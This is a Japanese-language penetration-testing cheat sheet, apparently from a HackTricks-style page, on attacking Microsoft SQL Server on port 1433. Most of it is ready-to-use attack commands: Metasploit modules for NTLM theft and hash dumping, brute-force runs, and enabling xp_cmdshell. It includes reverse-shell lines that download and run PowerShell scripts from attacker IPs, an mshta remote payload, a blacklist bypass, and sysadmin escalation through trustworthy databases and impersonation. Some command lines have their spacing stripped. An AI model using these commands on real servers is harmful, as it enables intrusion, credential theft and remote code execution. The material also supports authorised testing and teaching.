Microsoft SQL Server は リレーショナルデータベース 管理システムで、Microsoft によって開発されました。データベースサーバーとして、主な機能は、他のソフトウェアアプリケーションから要求されたデータを保存および取得することです。これらのアプリケーションは、同じコンピュータ上またはネットワーク(インターネットを含む)上の別のコンピュータで実行される場合があります。\
デフォルトポート: 1433
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
デフォルト MS-SQL システムテーブル
master データベース: このデータベースは、SQL Server インスタンスのすべてのシステムレベルの詳細をキャプチャするため、重要です。
msdb データベース: SQL Server Agent は、このデータベースを使用してアラートとジョブのスケジューリングを管理します。
model データベース: SQL Server インスタンス上のすべての新しいデータベースの青写真として機能し、サイズ、照合、リカバリモデルなどの変更が新しく作成されたデータベースに反映されます。
Resource データベース: SQL Server に付属するシステムオブジェクトを格納する読み取り専用データベースです。これらのオブジェクトは、Resource データベースに物理的に保存されますが、すべてのデータベースの sys スキーマに論理的に表示されます。
#Set USERNAME, RHOSTS and PASSWORD#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used#Steal NTLMmsf> useauxiliary/admin/mssql/mssql_ntlm_stealer#Steal NTLM hash, before executing run Responder#Info gatheringmsf> useadmin/mssql/mssql_enum#Security checksmsf> useadmin/mssql/mssql_enum_domain_accountsmsf> useadmin/mssql/mssql_enum_sql_loginsmsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/scanner/mssql/mssql_hashdumpmsf> useauxiliary/scanner/mssql/mssql_schemadump#Search for insteresting datamsf> useauxiliary/admin/mssql/mssql_findandsampledatamsf> useauxiliary/admin/mssql/mssql_idf#Privescmsf> useexploit/windows/mssql/mssql_linkcrawlermsf> useadmin/mssql/mssql_escalate_execute_as#If the user has IMPERSONATION privilege, this will try to escalatemsf> useadmin/mssql/mssql_escalate_dbowner#Escalate from db_owner to sysadmin#Code executionmsf> useadmin/mssql/mssql_exec#Execute commandsmsf> useexploit/windows/mssql/mssql_payload#Uploads and execute a payload#Add new admin user from meterpreter sessionmsf> usewindows/manage/mssql_local_auth_bypass
# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-tltickets.txt-ulusers.txt-hlhashes.txt-plpasswords.txt# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-hlhashes.txt-plpasswords.txt# Bruteforce using tickets against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-tltickets.txt-ulusers.txt# Bruteforce using passwords against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-plpasswords.txt# Bruteforce using hashes against the hosts listed on the hosts.txtmssqlpwnerhosts.txtbrute-ulusers.txt-hlhashes.txt
# Using Impacket mssqlclient.pymssqlclient.py [-db volume]<DOMAIN>/<USERNAME>:<PASSWORD>@<IP>## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machinemssqlclient.py [-db volume]-windows-auth<DOMAIN>/<USERNAME>:<PASSWORD>@<IP># Using sqshsqsh-S<IP>-U<Username>-P<Password>-D<Database>## In case Windows Auth using "." as domain name for local usersqsh-S<IP>-U.\\<Username>-P<Password>-D<Database>## In sqsh you need to use GO after writting the query to send it1>select 1;2> go
一般的な列挙
# Getversionselect @@version;# Get userselectuser_name();# Get databasesSELECTnameFROM master.dbo.sysdatabases;# UsedatabaseUSEmaster#Gettable namesSELECT*FROM<databaseName>.INFORMATION_SCHEMA.TABLES;#List Linked ServersEXEC sp_linkedserversSELECT*FROM sys.servers;#List usersselect sp.name aslogin, sp.type_desc aslogin_type, sl.password_hash, sp.create_date, sp.modify_date, casewhen sp.is_disabled =1then'Disabled'else'Enabled'endasstatusfrom sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type notin ('G', 'R') order by sp.name;#Create user with sysadmin privsCREATELOGIN hacker WITHPASSWORD='P@ssword123!'EXEC sp_addsrvrolemember 'hacker', 'sysadmin'#Enumerate linksenum_links#Use a linkuse_link [NAME]
# Get all the users and rolesselect*from sys.database_principals;## This query filters a bit the resultsselectname,create_date,modify_date,type_descastype,authentication_type_desc as authentication_type,sidfrom sys.database_principalswheretypenotin ('A', 'R')order byname;## Both of these select all the users of the current database (not the server).## Interesting when you cannot acces the table sys.database_principalsEXEC sp_helpuserSELECT*FROM sysusers
# Show all different securables namesSELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);# Show all possible permissions in MSSQLSELECT*FROM sys.fn_builtin_permissions(DEFAULT);# Get all my permissions over securable typeSERVERSELECT*FROM fn_my_permissions(NULL, 'SERVER');# Get all my permissions over a databaseUSE<database>SELECT*FROM fn_my_permissions(NULL, 'DATABASE');# Get members of the role"sysadmin"UsemasterEXEC sp_helpsrvrolemember 'sysadmin';# Getif the current user is sysadminSELECTIS_SRVROLEMEMBER('sysadmin');# Get users that can run xp_cmdshellUsemasterEXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD commandcrackmapexecmssql-d<Domainname>-u<username>-p<password>-x"whoami"# Username + Hash + PS commandcrackmapexecmssql-d<Domainname>-u<username>-H<HASH>-X'$PSVersionTable'# Check if xp_cmdshell is enabledSELECT*FROMsys.configurationsWHEREname='xp_cmdshell';# This turns on advanced options and is needed to configure xp_cmdshellsp_configure'show advanced options','1'RECONFIGURE#This enables xp_cmdshellsp_configure'xp_cmdshell','1'RECONFIGURE#One linerEXECsp_configure'Show Advanced Options',1; RECONFIGURE; EXECsp_configure'xp_cmdshell',1; RECONFIGURE;# Quickly check what the service account is via xp_cmdshellEXECmaster..xp_cmdshell'whoami'# Get Rev shellEXECxp_cmdshell'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'# Bypass blackisted "EXEC xp_cmdshell"'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'pingk7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
# Executing custom assembly on the current server with windows authentication and executing hostname commandmssqlpwnercorp.com/user:lab@192.168.1.65-windows-authcustom-asmhostname# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked servermssqlpwnercorp.com/user:lab@192.168.1.65-windows-auth-link-nameSRV01custom-asmhostname# Executing the hostname command using stored procedures on the linked SRV01 servermssqlpwnercorp.com/user:lab@192.168.1.65-windows-auth-link-nameSRV01exechostname# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate methodmssqlpwnercorp.com/user:lab@192.168.1.65-windows-auth-link-nameSRV01exec"cmd /c mshta http://192.168.45.250/malicious.hta"-command-execution-methodsp_oacreate
# Issuing NTLM relay attack on the SRV01 servermssqlpwnercorp.com/user:lab@192.168.1.65-windows-auth-link-nameSRV01ntlm-relay192.168.45.250# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25mssqlpwnercorp.com/user:lab@192.168.1.65-windows-auth-chain-id2e9a3696-d8c2-4edd-9bcc-2908414eeb25ntlm-relay192.168.45.250# Issuing NTLM relay attack on the local server with custom commandmssqlpwnercorp.com/user:lab@192.168.1.65-windows-authntlm-relay192.168.45.250
SELECT*FROMOPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
しかし、BULK オプションは ADMINISTER BULK OPERATIONS または ADMINISTER DATABASE BULK OPERATIONS 権限を必要とします。
# Checkif you have itSELECT*FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS'OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
MSSQL は Python および/または R のスクリプトを実行することを許可する場合があります。これらのコードは、コマンドを実行するために xp_cmdshell を使用しているユーザーとは異なるユーザーによって実行されます。
'R'"Hellow World!"を実行しようとした例(動作しない):
複数のアクションを実行するために構成された Python を使用した例:
# Print the user being used (andexecute commands)EXECUTE sp_execute_external_script @language =N'Python', @script =N'print(__import__("getpass").getuser())'EXECUTE sp_execute_external_script @language =N'Python', @script =N'print(__import__("os").system("whoami"))'#Openandread a fileEXECUTE sp_execute_external_script @language =N'Python', @script =N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'#MultilineEXECUTE sp_execute_external_script @language =N'Python', @script = N'import sysprint(sys.version)'GO
レジストリの読み取り
Microsoft SQL Serverは、ネットワークだけでなく、ファイルシステムやWindowsレジストリとも対話することを可能にする複数の拡張ストアドプロシージャを提供しています。**
通常
インスタンス対応
sys.xp_regread
sys.xp_instance_regread
sys.xp_regenumvalues
sys.xp_instance_regenumvalues
sys.xp_regenumkeys
sys.xp_instance_regenumkeys
sys.xp_regwrite
sys.xp_instance_regwrite
sys.xp_regdeletevalue
sys.xp_instance_regdeletevalue
sys.xp_regdeletekey
sys.xp_instance_regdeletekey
sys.xp_regaddmultistring
sys.xp_instance_regaddmultistring
sys.xp_regremovemultistring
sys.xp_instance_regremovemultistring
# Example read registryEXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';# Example write andthenread registryEXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';# Example tocheck who can use these functionsUsemaster;EXEC sp_helprotect 'xp_regread';EXEC sp_helprotect 'xp_regwrite';
# Get owners of databasesSELECTsuser_sname(owner_sid) FROM sys.databases# Find trustworthy databasesSELECT a.name,b.is_trustworthy_onFROMmaster..sysdatabases as aINNER JOIN sys.databases as bON a.name=b.name;# Get roles over the selected database (look for your username as db_owner)USE<trustworthy_db>SELECT rp.name as database_role, mp.name as database_userfrom sys.database_role_members drmjoin sys.database_principals rp on (drm.role_principal_id = rp.principal_id)join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)# If you found you are db_owner of a trustworthydatabase, you can privesc:--1. Create a stored procedure to add your user to sysadmin roleUSE<trustworthy_db>CREATEPROCEDURE sp_elevate_meWITHEXECUTEASOWNERASEXEC sp_addsrvrolemember 'USERNAME','sysadmin'--2. Execute stored procedure to get sysadmin roleUSE<trustworthy_db>EXEC sp_elevate_me--3. Verify your user is a sysadminSELECTis_srvrolemember('sysadmin')
# Find users you can impersonateSELECT distinct b.nameFROM sys.server_permissions aINNER JOIN sys.server_principals bON a.grantor_principal_id = b.principal_idWHERE a.permission_name ='IMPERSONATE'# Checkif the user "sa"or any other high privileged user is mentioned# Impersonate sa userEXECUTEASLOGIN='sa'SELECT SYSTEM_USERSELECTIS_SRVROLEMEMBER('sysadmin')# If you can't find any users, make sure to check for linksenum_links# If there is a link of interest, re-run the above steps on each linkuse_link [NAME]
-- Impersonate RegUserEXECUTEASLOGIN='RegUser'-- Verify you are now running as the the MyUser4 loginSELECT SYSTEM_USERSELECTIS_SRVROLEMEMBER('sysadmin')-- Change back to saREVERT
攻撃者はSQL Server Linked ServersのパスワードをSQLインスタンスから抽出し、平文で取得することができ、攻撃者にターゲットに対するより大きな足場を得るために使用できるパスワードを与えます。Linked Serversのために保存されたパスワードを抽出し復号化するスクリプトはこちらにあります。
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go
2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go
3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'